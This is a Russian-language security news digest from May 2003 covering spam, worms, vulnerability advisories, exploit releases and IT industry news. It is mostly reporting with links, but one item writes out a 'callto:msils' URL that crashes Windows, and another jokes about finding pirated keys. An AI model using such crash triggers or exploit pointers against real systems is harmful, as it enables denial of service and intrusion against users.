Спам (spam), он же джанк (junk), рекламный и прочий мусор, приходящий по электронной почте, стоит британскому бизнесу более 3 миллиардов фунтов стерлингов (около 4,5 миллиардов долларов) в год, утверждает интернет-компания Yahoo. Более того, этим летом впервые объем спама превысит объем нормальной почты, считает Yahoo. В результате опроса 1000 пользователей выяснилось, что каждый четвертый неосторожно открывал электронные послания, считая, что это та почта, которую он ожидает. Стоит ли говорить, как он обманывался в своих ожиданиях... В четверг Yahoo начала кампанию по разъяснению опасности тех писем, которых мы не ждем и не хотим получать, но открывать которые нас могут вынудить элементарным обманом. Эта инициатива - часть всемирной акции "День под девизом "Выкиньте электроный мусор". Ее цель - рекомендовать людям никогда не отвечать на спам (или джанк) и не пересылать его друзьям и знакомым. "Наше исследование показывает, что многие британцы, пользующиеся интернетом, не имеют представления о том, как эффективно справляться с мусором, приходящим по электронной почте, - говорит глава почтового отдела британской Yahoo Джон Уэбб. - В итоге больше половины британских пользователей фактически помогают распространению спама". Подробнее - http://news.bbc.co.uk/hi/russian/sci/tech/newsid_3050000/3050283.stm
25/05/2003 14:40 Почему иногда не видно компов в сетевом окружении.
Довольно часто приходится слышать вопросы от пользователей и начинающих Windows-админов "Почему не видно некоторых компов в сетевом окружении, однако, после их пингования они вдруг появляются?". На том же форуме SYSADMINS.RU (подфорум RTFM) появился довольно подробный ответ на подобный вопрос от участника форума под ником Denis. Заинтересованным - рекомендуется прочитать. Кстати, хотелось бы поблагодарить Дениса - сам не знал НАСТОЛЬКО подробно. :) Ссылка - http://portal.sysadmins.ru/board/viewtopic.php?t=12994
25/05/2003 14:29 Практические решения по использованию .htaccess в Apache.
Благодаря Rend c SYADMINS.RU обнаружена ссылочка на статью, посвящённую описанию практических рекомендаций использования файла .htaccess Вэб-сервера Apache. Несколько смущает фраза в заголовке - "Данные рекомендации тестировались на веб-сервере Apache/1.3.20 под операционную систему Windows 95/98 4.10", но в общем и целом впечатление положительное. Возможно - кому-то покажется полезным. Статья - http://forum.21.ru/faq/htaccess.html
25/05/2003 13:22 Патч для ядра Linux, позволяющий увеличить время работы ноутбука от батарей.
Как сообщается на сайте linux.org.ru, Jens Axboe опубликовал патч для 2.4.x Linux ядер, позволяющий уменьшить энергопотребление в ноутбуке работающем под Linux. Экономия достигается благодаря уменьшению времени активности (реже возникает необходимость "просыпаться") жесткого диска, одного из самых энергоемких устройств в ноутбуках. Патч для ядра 2.4.21-rc2 - http://www.kerneltrap.org/sup/653/laptop-mode-2.patch
25/05/2003 12:16 Надежна ли защита у вашего ISP?
Все ISP (Internet Service Provider) утверждают, что надежно защищают информацию клиентов от чужих глаз, однако на поверку применяемые меры безопасности могут оказаться не столь надежными, а ценная информация на корпоративных Web-узлах становится достоянием хакеров. Кто лучше других сможет выследить и поймать хакера? Такой же хакер. Так решил один Internet-провайдер, предоставляющий в аренду Web-узлы, называть которого мы не станем. И тогда он пригласил хакеров, известных под кличками Мадж и Велд, из бостонской группы l0pht, чтобы проанализировать случай незаконного вторжения. Эта парочка выяснила следующее. Некий злоумышленник обнаружил, что в одной из компаний, входящих в список Fortune 1000, которая была клиентом данного ISP, установки по умолчанию оказались плохо сконфигурированными. Чем он и воспользовался, заложив "ловушку" в Web-сервер. Нападавший проследил действия системного администратора компании-жертвы, когда тот входил на Web-сервер, чтобы проверить некоторые файлы. Слишком торопясь вернуться в корпоративную локальную сеть, он не воспользовался "logoff", а набрал свой пароль, проделав, таким образом, "дыру" в брандмауэре. С помощью общедоступной программы-"нюхача", которая считала пароль администратора и его идентификационный номер, злоумышленник обеспечил себе электронную идентичность с администратором, а затем прошел его путем к главному серверу корпораций. Неясно, что именно было целью хакера - украсть исходные коды, исполняемый модуль программы или просто ощутить радость победы. Очевидно лишь, что его действия - простейший сценарий, пользуясь которым, можно обойти брандмауэры и другие средства защиты ISP, чтобы нанести ущерб их клиентам. Так считает Мадж, который вместе с Велдом и другими членами группы l0pht поставил свой опыт хакерства на службу исследованию и тестированию систем. Источник - http://www.crime-research.org
25/05/2003 11:06 HP выпускает ПК с чипом для шифрования на материнской плате.
HP выпустил свои первые ПК, содержащие отдельную микросхему на системной плате для шифрования и защиты данных. Это серия ПК для корпоративного применения d530, которые включают в себя дополнительный чип от Infineon позволяющий установить множественную идентификацию на одном компьютере с различным уровнем секретности. Также чип дает возможность управления общим ключом для шифрования данных. Компания будет использовать чип в машинах бизнес-класса среднего уровня. Пользователи смогут отключать его либо через настройки в BIOS, либо путем физического удаления с материнской платы. Кстати, подобную систему годом раньше выпустил IBM, однако НР затратил это время на разработку более дешевого и защищенного интерфейса. НР является одним из членов-учредителей Trusted Computing Group, другими соучредителями которого являлись Intel, Microsoft и Compaq, и куда теперь вошли дополнительно AMD, Sony и NEC. Целью группы является установка аппаратно-программных стандартов, которые должны устранять воровство интеллектуальной собственности и использование пиратского ПО. Источник - http://www.cnews.ru
24/05/2003 12:32 Выход Nessus 2.0.6.
Renaud Deraison от имени проекта Nessus объявил о выпуске новой версии этого популярного сканера уязвимостей - 2.0.6. Выпуск новой версии был обусловлен обнаружением уязвимости в старых версиях - в скриптовом движке NASL. Наличие уязвимостей позволяет выйти за пределы "песочницы" (sandbox) и выполнить в системе произвольный код. Для эксплуатации уязвимости злоумышленник должен иметь доступный Nessus - эккаунт, либо иметьвозможность загружать плагины на Nessus-сервер (запрещено по умолчанию). Уязвимости были обнаружены всё тем же Sir Modred. Первая уязвимость обнаружена в некорректном переключении целого в функции insstr(), вторая - в возможности переполнения буфера в функции scanner_add_port() и третья - опять с возможностью переполнения буфера в функции ftp_log_in(). В описании обращено внимания, что не обнаружено возможности проведения атаки на Nessus-сервер от имени тестируемого хоста. Всем рекомендуется либо обновиться до новой версии, либо проверить установку опции 'plugins_upload' в файле nessusd.conf (должна быть 'no'). Подробности - http://ftp.nessus.org/nessus/nessus-2.0.6/
24/05/2003 11:44 Уязвимость в Darwin Streaming Server.
Sir Mordred обнаружил нексолько уязвимости в Darwin Streaming Server (DSS) - серверной технологии, позволяющей поток QuickTime-данных к клиенту через Интернет, используя Интернет протоколы RTP и RTSP. Первая уязвимость связана с переполнением целого в модуле QTSSReflector (подпрограмма обработки запроса ANNOUNCE). Вторая уязвимость связана с переключением целого в утилите MP3Broadcaster (попрограмма обработки тегов ID3). Уязвимости обнаружены в Linux RedHat 7.2 с DSS 4.1.3. Подробности - http://archives.neohapsis.com/archives/bugtraq/2003-05/0245.html
24/05/2003 11:07 «Лаборатория Касперского» требует от Microsoft залатать дыры в Internet Explorer.
Журнал Theinquirer.net опубликовал любопытную статью, где «Лаборатория Касперского» обвиняет софтверного гиганта в халатном отношении к своим продуктам и призывает руководство Microsoft незамедлительно выпустить заплатку к Internet Explorer. В распространенном в западных изданиях заявлении «Лаборатория Касперского» утверждает, что дыра в Internet Explorer, к которой софтверная компания до сих пор не выпустила необходимую заплатку, создает серьезные проблемы для пользователей Internet Explorer подвергая опасности их компьютеры и оставляя беззащитным перед троянским вирусом StartPage. Троянец StartPage эксплуатирует брешь Exploit.SelfExecHtml в системе безопасности Internet Explorer. Данная брешь была обнаружена более двух месяцев назад, однако "заплатка" для нее до сих пор отсутствует: компания Microsoft до сих пор не выпустила "заплатку" для Internet Explorer, которая закрывает указанную брешь. «Лаборатория Касперского» обратилась к компании Microsoft выпустить заплатки к программам Microsoft Internet Explorer 5.0 для Windows 2000, Microsoft Internet Explorer 5.0 для Windows 95, Microsoft Internet Explorer 5.0 для Windows 98 и Microsoft Internet Explorer 5.0 для Windows NT 4.0. Подробнее - http://www.internet.ru/lentanews/n_ng62.esp
24/05/2003 10:34 Модуль для IE предотвращает утечку документов.
Microsoft выпустила встраиваемый модуль для Internet Explorer, предназначенный для защиты конфиденциальных документов от несанкционированного редактирования или копирования. Это первый этап реализации усилий компании по привлечению корпораций к использованию ее ПО для обмена ответственной информацией. Плагин Rights Management Add-on, предлагаемый в виде бета-версии, позволяет просматривать файлы пользователям, наделенным надлежащими правами. Плагин должен помочь компаниям защитить конфиденциальные документы, e-mail и другие данные на базе веб-технологий от манипулирования, пересылки или копирования лицами, не имеющими на это право. Microsoft начала развивать технологию управления правами недавно. На прошлой неделе CEO Стив Баллмер обратился к заказчикам с письмом, в котором рассказал о планах компании в области служб управления цифровыми правами (digital rights management, DRM), отвечающих как требованиям обычных предприятий, так и нуждам индустрии развлечений. В этом году Microsoft выпустила опытную версию инструментов защиты Windows Rights Management Services (RMS) для Windows Server 2003 и пообещала позднее предложить версию для других операционных систем. Корпоративно-ориентированный продукт RMS выйдет в конце этого года. Сначала он будет поставляться отдельно от Windows Server 2003, но впоследствии, по словам представителя Microsoft Джона Марчисона, должен быть интегрирован в операционную систему. Цены на этот продукт компания еще не объявила. Бета-версия 1.0 Rights Management Add доступна для загрузки на веб-сайте Microsoft со вторника и работает с последними операционными системами Microsoft — такими как Windows XP, Windows 2000 Service Pack 3 или Windows Server 2003. Ее поддерживает только Internet Explorer 6. Подробности - http://zdnet.com.com/2100-1105_2-1009101.html
24/05/2003 10:14 Канадских студентов научат писать вирусы.
Курс по созданию компьютерных вирусов появится в программе университета Калгари в Канаде, сообщает Vnunet. Студенты факультета информационных технологий начнут постигать премудрости программирования вирусов и прежде всего троянов уже в новом учебном году. Основной акцент курса, как описывают его представители университета, будет сделан на "разработке программ, при помощи которых можно ввергнуть мировой Интернет в хаос и ежегодно причинять ущерб в миллиарды долларов". Администрация ВУЗа считает, что после обучения азам программирования вирусов, студенты смогут понять, как эффективно бороться с компьютерной "заразой". Преподаватели отмечают, что обучение будет вестись на легальной основе, в соответствии с нормами этики и компьютерной безопасности. Грэхем Клюли (Graham Cluley), старший консультант компании Sophos Anti-Virus категорически не согласен с позицией профессоров университета. По его мнению, учить "детей" созданию вирусов, рассчитывая, что в последствие они посвятят себя борьбе с кибер-червями, так же нелепо, как обучать студентов угону автомобилей, в надежде, что потом они станут полицейскими". Подробности - http://www.vnunet.com/News/1141141
24/05/2003 09:22 Суд в США: как русских хакеров заманили в ловушку?
На сайте oxraha.ru опубликован перевод статьи из "Вашингтон Пост", в котором рассказывается о том, как наши соотечественники Горшков и Иванов, процесс над которыми сейчас проходит в США. Горшкова приговорили к трем годам лишения свободы. Также он должен выплатить 700 тыс. долларов в возмещение причиненного им ущерба. Иванов признал свою вину в хакерском нападении на 16 компаний, включая E-money и PayPal. Ему грозит до 20 лет тюремного заключения и штраф в размере 250 тыс. долларов. Необходимо признать, что после прочтения статьи складывается мнение о не совсем чистой работе ФБР. Во-первых, ребят сначала выманили из России, а потом, якобы для проверки их навыков и умения попросили попросили войти на домашние компьютеры. На компьютерах была установлена программа, которая позволила зафиксировать пароли хакеров - позже ФБР воспользуется ими, чтобы взломать домашние компьютеры Иванова и Горшкова. Надо отметить, отметить, что статья довольно поучительна. Cтатья - http://www.oxpaha.ru/view.asp?8959
24/05/2003 09:09 Выход Outpost Firewall Pro 2.0.
Вышла вторая версия довольно неплохого (по мнению некоторых - даже лучшего) персонального файрволла Outpost Firewall Pro 2.0. Улучшен графический интерефейс, добавлен Log Viewer, добавлен сервис, показывающий какие службы висят на каком порту. Добавлена возможность сохранения настроек со старой (1.0) версии. Также добавлены новые возможности блокировки хакерских атак на основании технологий: Components Control, Stateful Packet Inspection и Process Safety. Также улучшена работа модулей блокировки рекламы и определения атак. Пользователи старой версии могут свободно скачать продукт. Весит - 5.2 МБ. Хотелось ба обратить внимание, что версия Pro - платная (что, впрочем, не мешает найти ключи от неё -;)). Подробности - http://www.agnitum.com/news/outpostpro20released.html
23/05/2003 12:41 И опять очередная уязвимость в Windows.
David F. Madrid из одноимённого испанского города сообщает о возможности вызвать "экран синей смерти" (он же BSOD, он же Blue Screen Of Death) в ОС W2000 Server Sp3 с IE 6.0 Sp1, а также в XP Pro с IE 6.0, сформировав специальный NetMeeting URL (callto Urls). В процессе обработки подобного URL, Windows валится из-за того, что не может корректно обработать Kmode-исключение (Kmode exception в оригинале сообщения). Вызов имеет вид callto:msils. Автором опубликована ссылка, на которой демонстрируется уязвимость. Для демонстрации надо нажать на ссылку "Pulsa aquМ para parar Windows" (енто на испанском). Microsoft исследует проблему, но, судя по всему, слишком долго, поэтому автор и решил опубликовать сообщение об уязвимости. Демонстрация - http://nautopia.org/vulnerabilidades/callto_bluescreen.htm
23/05/2003 11:57 Новый червь Petik.N.
Вирусная Лаборатория компании Panda Software обнаружила появление нового опасного червя Petik.N (VBS/Petik.N). Petik.N перезаписывает все файлы на зараженном им компьютере. Это означает, что вся информация может быть утеряна и восстановить ее не удастся. Перед уничтожением файлов Petik.N создает сотни пустых .TXT файлов на рабочем столе Windows. Их имена начинаются со слова ‘stress’, к которому случайным образом прибавляются четыре буквы. Особенно опасен Petik.N для корпоративной среды, так как в основном он распространяется через общие сетевые диски. Всем пользователям советуют осторожно обращаться со всей полученной почтой и незамедлительно обновить свои антивирусные средства. Источник - http://www.viruslab.ru
23/05/2003 11:24 Microsoft официально представила в России Windows Server 2003.
20 мая представительство Microsoft в России и СНГ провело презентацию для российских пользователей новой серверной ОС Windows Server 2003 (WS2003). Кроме этого, были представлены средства разработки Visual Studio .NET 2003 и SQL Server 2000 Enterprise Edition. Презентацию посетили около трёх тысяч IT-специалистов и представителей прессы. Москвичи и гости столицы были приглашены в универсальный спортивный комплекс ЦСКА, а жители Екатеринбурга, Нижнего Новгорода, Новосибирска, Ростова-на-Дону и Алма-Аты наблюдали происходящее посредством интернет-трансляции. Петербуржцы и киевляне увидели новые продукты Microsoft в своих городах 21 и 22 мая соответственно. Официальную часть презентации открыла Ольга Дергунова, глава представительства Microsoft в России и СНГ, выступив с пленарным докладом, лейтмотивом которого был лозунг: "Больше результатов за меньшие деньги". Были приведены следующие цифры: компании тратят 70% средств на поддержание старых систем, и только 30% - на закупку новых. Использование же новой ОС Windows Server 2003 позволяет уменьшить время простоев в 8 раз и повысить производительность вдвое, по сравнению с Windows Server NT4.0. Подробности - http://www.compulenta.ru/2003/5/23/39605/
23/05/2003 11:06 Очередной эксплоит уязвимости в sendmail.
Группа исследователей сетевой безопасности, называющая себя 127 Research and Development опубликовала в Интернет результаты исследования уязвимости в sendmail версии до 8.12.9. Напомним, что уязвимость в функции prescan() была обнаружена в апреле Michael Zalewski и позволяла при наличии определённых условий получить шелл на удалённом сервере. Don Bailey обнаружил довольно интересную реализацию этой уязвимости, которая ещё не публиковалась до этого в широкой печати. Техника заключается в манипулировании текстовыми сегментами. Опубликован материал, описывающий уязвимость, а также эксплоит под названием prejack.c. Подробности - http://www.7f.no-ip.com
23/05/2003 10:40 Cтатья об обеспечении безопасности Apache.
На сайте SecurityFocus опубликована статья, описывающая пошаговую инструкцию по обеспечению безопасности популярного Web-сервера Apache версии 1.3.x. Как пишет сам автор, описанная им технология установки и конфигурирования сервера поможет избежать взлома сервера при появлении новых уязвимостей. Статья - http://www.securityfocus.com/infocus/1694
23/05/2003 10:16 Спам: взгляд Билла Гейтса.
Вчера Билл Гейтс (Bill Gates), председатель и главный архитектор программных продуктов одной очень большой компании, обратился с письмом к Конгрессу США, обозначив свой взгляд на разрастающуюся проблему спама. "Поток нежелательных, неприятных, часто оскорбительных и порой мошеннических электронных писем разрушает веру в технологии, обходится бизнесу в миллиарды долларов в год и уменьшает нашу с вами возможность реализации полного потенциала современной технологии", - пишет Гейтс. В предлагаемом им разностороннем подходе к решению проблемы, учитывающем как государственные инициативы, так и силы саморегуляции индустрии, основной упор делается на законодательное закрепление обязательности индикации рекламного характера электронного письма (например, добавлением акронима ADV в тему такого письма). Кроме того, Microsoft предлагает создать специальную независимую организацию, ответственную за поиск и последующее претворение в жизнь методов борьбы со спамом. Источник - http://www.viruslist.ru
23/05/2003 09:11 Лаборатория Касперского объявляет о начале бета-тестирования трех продуктов новой серии 4.5.
"Лаборатория Касперского" открывает программу бета-тестирования новой версии Windows-компонент пакета Антивирус Касперского(R) Business Optimal 4.5 (антивирусная защита для Windows-серверов, Windows-рабочих станций и система централизованного управления Kaspersky(R) Administration Kit). Новые версии Windows-компонент Антивируса Касперского(R) Business Optimal имеют ряд существенных изменений по сравнению с предшественницами. За счет внедрения новой технологии iChecker в значительной мере увеличена производительность и отказоустойчивость резидентного антивирусного модуля Monitor. Доработка также коснулась недостатков, выявленных в предыдущих версиях продуктовв процессе их использования. Результатом сотрудничества наших экспертов "Лаборатории Касперского" и пользователей продуктов компании стало устранение всех зафиксированных случаев некорректной работы программных модулей. Серьезной модернизации также подверглась система централизованной установки и управления антивирусной защитой Kaspersky(R) Administration Kit. Эта компонента позволяет системному администратору осуществлять инсталляцию и контроль компонентов Антивируса Касперского(R) с любого компьютера. Усовершенствованная версия Kaspersky(R) Administration Kit 4.5 специально разработана для обеспечения максимально эффективного и высокопроизводительного функционирования всех компонентов антивирусной защиты и наилучшим образом соответствует особенностям этих программ. Подробности - http://www.kaspersky.ru/beta.html
23/05/2003 09:05 Американские военные опасаются российских хакеров.
По данным Министерства обороны США, в 2002 году было зафиксировано 45 тыс. хакерских атак на военные сети США. Такого рода вторжения составили более трети общего числа кибератак, проведенных на американские сети. Наибольшую опасность представляют хакеры из бывшего СССР, стран Восточной Европы и Китая. Подавляющее большинство случаев было "проверкой на прочность" систем защиты. Столкнувшись с кибербарьерами, хакеры предпочитали не рисковать и не пытались взломать их. Однако примерно 200 раз хакеры пытались получить контроль над военными серверами, несколько сотен раз они атаковали военные сети США с помощью компьютерных вирусов. Также было зафиксировано 46 попыток взлома сайтов. По подсчетам Carnegie-Mellon's CERT Coordination Center, коммерческие и образовательные сети США в 2002 году подвергались атакам хакеров более 82 тыс. раз. Специалисты Министерства обороны США, опрошенные газетой Defense News, считают, что успешное проникновение посторонних в военные компьютерные сети США маловероятно, поскольку их защиту обеспечивают слишком много высококлассных специалистов. Значительно более вероятны атаки компьютерных вирусов, "червей" и "троянцев". Иногда подобные программы создаются специально для одной атаки, и системы компьютерной безопасности временами не в состоянии идентифицировать их. Джо Фраццини (Joe Frazzini), вице-президент компании iDefense, оказывающей услуги в области компьютерной безопасности ряду государственных структур США, считает, что наибольшую опасность для сетей США представляют хакеры из бывшего СССР, стран Восточной Европы и Китая. Первых он называет "ворами", поскольку они достаточно успешно взламывают сети финансовых структур США. Хакеры с постсоветского пространства ничего не разрушают, они лишь пытаются украсть деньги. Китайские хакеры получили условное название "хулиганы". Они специализируются на использовании компьютерных вирусов и атакуют с их помощью сети государственных организаций США. Их главной целью является разрушение. Источник - http://www.cnews.ru
22/05/2003 15:16 В Таиланде арестован интернет-пират с Украины.
В Таиланде по требованию США арестован 25-летний гражданин Украины Максим Ковальчук. Ему предъявлено обвинение в продаже через Интернет пиратского программного обеспечения на общую сумму более трех миллионов американских долларов, сообщает Reuters. Кроме нарушения закона об авторских правах, власти Калифорнии обвиняют Ковальчука в торговле контрафактным товаром, отмывании "грязных" денег, а также в нелегальном доступе к сети. Полиция Бангкока пообещала экстрадировать Ковальчука в США. Сам задержанный отрицает все обвинения и говорит, что приехал в Тайланд на отдых. Подробности - http://www.lenta.ru/internet/2003/05/21/hacker/
22/05/2003 14:52 Загрузка произвольных файлов в Microsoft Outlook Express.
Уязвимость обнаружена в Microsoft Outlook Express. Удаленный атакующий может незаметно загрузить и выполнить произвольный файл на компьютере адресата в обход любых ограничений безопасности в Outlook Express. Опубликова код, позволяющий загрузить произвольный файл при открытии почтового сообщения, в установках по умолчанию Outlook Express: RESTRICTED ZONE. При этом никакие предупреждения пользователь не получит. Эксплоит также опубликован. Уязвимость обнаружена в Outlook Express 6.00.2800.1123 с WMP 7.01.00.3055 и 8.00.00.4487 [WMP 9 не срабатывает!]. Подробности - http://www.securitylab.ru/?ID=37924
22/05/2003 14:02 Очередные подробности про челябинских хакеров.
По сообщениям на bugtraq.ru, Вашингтонпост снова публикует статью, открывающую подробности заманивания и задержания в США челябинских хакеров Горшкова и Иванова. Общая тональность статьи такова, что не смотря на титанические усилия правоохранительных органов США хакеры процветают. Всплыл новый персонаж - коллега задержанных, который заработал на хаке квартиру, машину и кучу других благ. По словам автора, этот злой гений утащил секрет нового компьютерного чипа, поимел небольшого провайдера и даже правительственное агенство Уругвая (интересно, нафига оно ему?). Одним словом, очередной злобный пасквиль с целью выбить побольше денег на борьбу с компьютерными преступлениями. Подробности - http://www.washingtonpost.com/ac2/wp-dyn/A12984-2003May19?language=printer
22/05/2003 12:25 Программка для изменения пароля пользователя в Windows.
Программа позволяет загрузиться с дискеты (или сидюка) и поменять/сбросить пароль любому юзеру WinNT/2k/XP, включая админа (за исключением машин под AD). Если забыт пароль администратора - жутко полезная штука. Бесплатна. Имидж дискеты - http://home.eunet.no/%7Epnordahl/ntpasswd/bd030426.zip Программа для записи - http://home.eunet.no/%7Epnordahl/ntpasswd/rawrite2.zip
22/05/2003 11:11 Троянец "StartPage" атакует дыру в Internet Explorer.
"Лаборатория Касперского", сообщает о регистрации в рунете массовой рассылки электронных писем, содержащих троянскую программу "StartPage". На данный момент в службу технической поддержки компании уже поступило множество обращений пользователей о случаях заражения этой вредоносной программой. Использование русского языка однозначно указывает на Россию или страны бывшего СССР как на место происхождения "StartPage". Внутри вложенного файла REG.ZIP содержится файл REG.HTML, при открытии которого запускается носитель "троянца" - файл REG.EXE. Интересная особенность состоит в том, что запуск осуществляется абсолютно незаметно для пользователя - для этого "StartPage" использует брешь "Exploit.SelfExecHtml" в системе безопасности Internet Explorer. Данная брешь была обнаружена более двух месяцев назад, однако "заплатка" для нее до сих пор отсутствует. "Инцидент может иметь далеко идущие последствия. Как известно, использование брешей для проникновения на компьютеры - любимое занятие вирусописателей. Именно этому методу обязано около 80% случаев всех вирусных инцидентов. Однако до сих пор практически все они были вызваны брешью "IFRAME". Сейчас мы наблюдаем как на "арену" выходит новая брешь, которая может дать толчок к созданию множества новых вредоносных программ и возникновению новых глобальных эпидемий", - комментирует Евгений Касперский, руководитель антивирусных исследований "Лаборатории Касперского". К счастью, "StartPage" является довольно безопасной программой. Среди ее побочных действий - модификация стартовой страницы Internet Explorer на сайт www.911club.ru. Источник - http://www.kaspersky.ru
22/05/2003 10:15 Чистосердечное признание.
Microsoft не стала дожидаться, пока факт откроет какая-нибудь индийская security-компания и честно призналась: да, встроенный в последние версии ОС Windows сетевой экран не фильтрует и вообще никак не блокирует трафик через IPv6, последнюю версию интернет-протокола. Речь идёт о различных версиях Windows XP и Server 2003. Рекомендуется озаботиться поисками сетевого экрана, который умеет перехватывать IPv6 трафик. Заметим, что сетевой экран, который умеет фильтровать вышеназванный трафик, уж наверняка умеет фильтровать и данные, приходящие посредством более ранних версий интернет-протокола, что ставит под сомнение сам смысл существования встроенного в Windows сетевого экрана. Подробности - http://www.viruslist.com/index.html?tnews=1006&id=2315860
22/05/2003 09:04 Скриншоты из фильма "Матрица: Перезагрузка".
Как мы писали ранее, в кадрах фильма, посвящённымпроцессу взлома впервые использовалась реальная программа - сканер Nmap. На сайте compulenta.ru выложены скриншоты, на которых видно то, о чём шёл разговор. Nmap сканирует IP-адрес 10.2.2.2 и находит открытый порт 22. Этот порт используется SSH. Следующий шаг Тринити: она запускает эксплойт под названием sshnuke, который, как следует из появившейся на консоли надписи, пытается воспользоваться уязвимостью SSH CRC32. Это реально существующая уязвимость SSH, которая была обнаружена в начале 2001 года. Правда, нужно заметить, о существовании хакерской программы sshnuke пока ничего неизвестно. Тем не менее, программа делает своё дело, и перед Тринити открывается консоль с правами администратора системы, и она немедленно меняет администраторский пароль на Z1ON0101. Подробности - http://www.compulenta.ru/2003/5/22/39589/page6.html
21/05/2003 13:01 Новый визуальный язык программирования от создателей Java.
Специалисты компании Sun занимаются разработкой нового языка программирования Ace, отличающегося высокой степенью визуализации процесса разработки. В большинстве случаев для создания и модификации кода можно будет оперировать исключительно визуальными образами: прямоугольниками, соединительными линиями, целыми диаграммами и т.п. Например, перемещение линии, соединяющих два прямоугольника позволит изменить места ввода данных в программу. Впрочем, по словам одного из разработчиков языка Али Сайеда, совсем без программирования обойтись не получится. Непрофессиональный программист сможет создать скелет будущей программы в визуальном режиме, однако для того чтобы приложение стало работоспособным, придется написать самостоятельно хотя бы небольшой фрагмент кода. При этом в программу можно будет вносить изменения уже после завершения работы над ее основными компонентами. В основу Ace положен широко известный язык Java. В Sun надеются, что появление Ace позволит значительно облегчить процесс разработки приложений, предназначенных для работы в интернете и на мобильных устройствах. При этом код должен автоматически оптимизироваться под необходимую платформу с целью достижения максимальной производительности. Подробности - http://www.compulenta.ru/2003/5/21/39568/
20/05/2003 12:54 Министерство Обороны США учтёт пожелания американцев.
Американское министерство обороны обещает учесть интересы американских граждан при развертывании системы тотальной слежки Total Information Awareness. В эту систему, предназначенную для выявления потенциальных террористов, будут встроены решения, обеспечивающие право обычных граждан на конфиденциальность. Сама система при этом будет переименована в Terrorist Information Awareness (TIA). На подобные шаги Пентагон вынужден был пойти, после того как Конгресс США заморозил финансирование программы до тех пор, пока военное ведомство не обеспечит соблюдения гражданских свобод. Для выявления террористов TIA будет анализировать такие данные, как динамика финансовых транзакций, записи о маршрутах передвижения пассажиров и т.д. Подробности - http://story.news.yahoo.com/news?tmpl=story....
19/05/2003 17:14 130 человек схвачено в ходе облавы на интернет-мошенников.
Как сообщило Министерство юстиции США, в ходе последнего рейда правоохранительных органов по борьбе с интернет-мошенничеством арестовано более 130 человек. В пятницу Генеральный прокурор Джон Ашкрофт, директор ФБР Роберт Мюллер, заместитель генерального прокурора Майкл Чертофф и председатель Федеральной торговой комиссии (ФТК) Тим Мурис объявили о массовых арестах: по их словам, у преступников изъято свыше 17 млн $. Аресты стали частью общенациональной операции E-Con, в которой участвуют 43 прокуратуры США, а также ФБР, ФТК, Служба инспекции почт и другие государственные и местные правоохранительные органы США и других стран. В ходе операции было выдано свыше 70 ордеров на обыск, которые во многих случаях привели к предъявлению обвинений или признанию вины. Проведено более 90 расследований по 89 тыс. заявлений от жертв мошенничества. Интернет-мошенничество растет быстрыми темпами, и участники операции E-Con стараются его унять. «Всего три года назад с интернетом был связан 31% жалоб на мошенничество, поступающих в ФТК, говорится в заявлении Муриса. В 2002 году этот процент увеличился до 47%. Мы ожидаем, что к концу этого года жалобы, связанные с интернетом, превысят половину всех жалоб на мошенничество, поступающих в ФТК» Подробности - http://www.zdnet.ru/?ID=300930
19/05/2003 16:59 Выложена финальная версия проекта Understanding the Linux Virtual Memory Manager
Mel Gorman в рассылке LKML сообщил о том, что им была выложена финальная версия документа, описывающего принципы работы и организации менеджера памяти в ядре ветви 2.4 ОС Linux. Скачать в PDF Ознакомиться [HTML] Ознакомиться [Text]
19/05/2003 12:31 Статистические системы обнаружения вторжений.
На сайте securitylab.ru выложена очередная статья-перевод с сайта SecurityFocus - под названием "Статистические системы обнаружения вторжений". Как следует из названия, статья описывает работу статистическим системам опрделения вторений - SBID, представляющими собой альтернативу системам, основанным на правилах (RBID). Cтатья - http://www.securitylab.ru/?ID=37879
19/05/2003 11:25 SCO прекращает поддержку UnitedLinux.
SCO выводит маркетинговые и деловые разработки, а также финансовые ресурсы из UnitedLinux, ставя под сомнение свое положение в консорциуме. Однако UnitedLinux, создававшийся как дистрибьютор Linux промышленного класса, выживет даже без поддержки SCO, утверждает другой член консорциума, SuSE Linux. Отношения SCO c ее партнерами по консорциуму стали напряженными уже после миллиардного иска со стороны SCO в отношение IBM в марте этого года. Как заявил вице-президент SuSE Джозеф Экерт (Joseph Eckert), действия SCO не повлияют на поддержку всех пользователей и партнеров консорциума. Также он сообщил, что на запрос SuSE относительно пояснения по поводу сделанного SCO заявления, последняя ничего не ответила. В ответ на недавнее заявление SCO об юридической ответственности пользователей, использующих версии Linux c кодом, принадлежащим SCO, SuSE сообщила, что будет соблюдать все договоренности UnitedLinux с заказчиками и партнерами вне зависимости от действий SCO. Также г-н Экерт добавил, что UnitedLinux использует простой базовый код, и его свойство “автопостроения” подразумевает, что любые изменения могут быть сделаны для всех реализаций очень легко. Источник - http://vnunet.com
19/05/2003 10:05 Новый почтовый червь прикрывается именем Microsoft
По состоянию на 19 мая в Интернете зарегистрировано большое количество случаев обнаружения нового сетевого червя Palyh, соообщает "Лаборатория Касперского". Указанный вирус маскируется под сообщения от службы технической поддержки Microsoft и распространяется в электронных письмах и ресурсах локальных сетей. Palyh доставляется на целевой компьютер в виде файла, вложенного в письмо электронной почты или записанного в систему через локальную сеть. При запуске файла-носителя червь активизируется, после чего заражает компьютер и начинает процедуру распространения. При установке Palyh копирует себя под именем MSCCN32.EXE в каталог Windows и регистрируется в ключе автозапуска системного реестра. Таким образом, червь обеспечивает свою загрузку в память компьютера при старте операционной системы. Из-за ошибки автора вредоносной программы в некоторых случаях Palyh копирует себя в другие каталоги, и в этих случаях функция автозапуска не срабатывает. Для рассылки по электронной почте Palyh сканирует файлы с расширениями TXT, EML, HTML, HTM, DBX, WAB и выделяет из них строки, похожие на электронные адреса. Затем червь в обход установленной почтовой программы подключается к используемому SMTP-серверу и рассылает через него на найденные адреса свои копии. Источник - http://www.lenta.ru/internet/2003/05/19/palyh/
18/05/2003 11:45 Cтатья "Использование системы LVM".
На сайте Russian Linux Gazette опубликован очередной перевод Ивана Песина, который посвящён, как следует из названия, системе LVM - системе управления логическими томами. Linux LVM может сделать вашу жизнь легче. Эта система реализует более высокий уровень абстракции при рассмотрении пространства хранилищ, чем разделы или диски. LVM была внедрена в ядро Linux, начиная с серии 2.4.x (есть патчи и для версии 2.2.х). Статья - http://gazette.linux.ru.net/lg84/vinayak.html
18/05/2003 11:40 Выход Mozilla Firebird 0.6.
